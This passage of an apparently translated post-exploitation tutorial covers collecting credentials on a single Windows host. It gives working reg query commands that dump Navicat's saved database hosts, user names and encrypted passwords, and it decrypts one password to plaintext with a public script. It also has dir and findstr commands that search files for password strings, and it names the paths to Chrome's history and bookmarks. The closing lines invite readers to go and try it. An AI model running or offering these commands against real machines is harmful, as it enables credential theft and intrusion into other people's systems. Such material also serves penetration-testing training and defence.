[MySQL, MSSQL, Oracle, SQLite, MariaDB, PostgreSQL]: the host, port and account are stored in clear text; the password uses Navicat's own encryption, for which a decryption script is available online.
MySQL: HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\
MariaDB: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB\Servers\
Microsoft SQL: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL\Servers\
Oracle: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra\Servers\
PostgreSQL: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG\Servers\
SQLite: HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite\Servers\

// list the Navicat keys
C:\Users\Administrator> reg query HKCU\Software\PremiumSoft /f Navicat
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMARIADB
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMONGODB
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatMSSQL
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatOra
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPG
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatPremium
HKEY_CURRENT_USER\Software\PremiumSoft\NavicatSQLite
End of search: 8 match(es) found.

// view user names
C:\Users\Administrator> reg query HKCU\Software\PremiumSoft /s /f UserName /e
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122
    UserName    REG_SZ    root
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123
    UserName    REG_SZ    root

// view the encrypted passwords
C:\Users\Administrator> reg query HKCU\Software\PremiumSoft /s /f Pwd /e
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.122
    Pwd    REG_SZ
HKEY_CURRENT_USER\Software\PremiumSoft\Navicat\Servers\192.168.1.123
    Pwd    REG_SZ    5658213BB7E6B3

https://github.com/HyperSine/how-does-navicat-encrypt-password

C:\Users\Administrator\navicat-encrypt-password\python3> python3 NavicatCryptoHelper.py -d 5658213BB7E6B3
rootstocks

TeamViewer, Xshell, VNC, WinSCP, FoxMail, etc.
7. Account passwords saved in files
[file names]:
dir /s /b "*password*" "*login*" "*assets*" "*VPN*" "*svn*" "*git*" "*handover*" "*termination*" "*network*" "*backend*" "*topology*" "*mailbox*" "*salary*" "*administrator*" "*patrol*" "*backup*"
[file contents]: search files with the suffixes *.conf *.asp *.php *.aspx *.cgi *.xml *.ini *.inf *.txt *.cgi for lines containing keywords such as "user=", "pass=", "login=", "uid=" and "pwd=".
findstr /i /c:"user=" /c:"pass=" /c:"login=" /c:"uid=" /c:"pwd=" /si *.conf *.asp *.php *.jsp *.aspx *.cgi *.xml *.inf *.txt *.cgi
Other information
1. Browser history and bookmarks
[Chrome bookmarks]: JSON format
C:\Users\<current user name>\AppData\Local\Google\Chrome\User Data\Guest Profile\Bookmarks
[Chrome history]: SQLite format, not password protected.
C:\Users\<current user name>\AppData\Local\Google\Chrome\User Data\Default\History
Firefox, IE, Safari, etc.
Tool: http://www.nirsoft.net
2. Commonly used file locations
[Desktop, Downloads]: there is a good chance of finding something useful here.
dir %homepath%\Desktop
dir %homepath%\Download
This concludes the study of how to carry out single-host information collection. I hope it has answered your doubts. Combining theory with practice helps you learn better, so go and try it! If you want to keep learning related topics, please continue to follow the website; the editor will keep working to bring you more practical articles!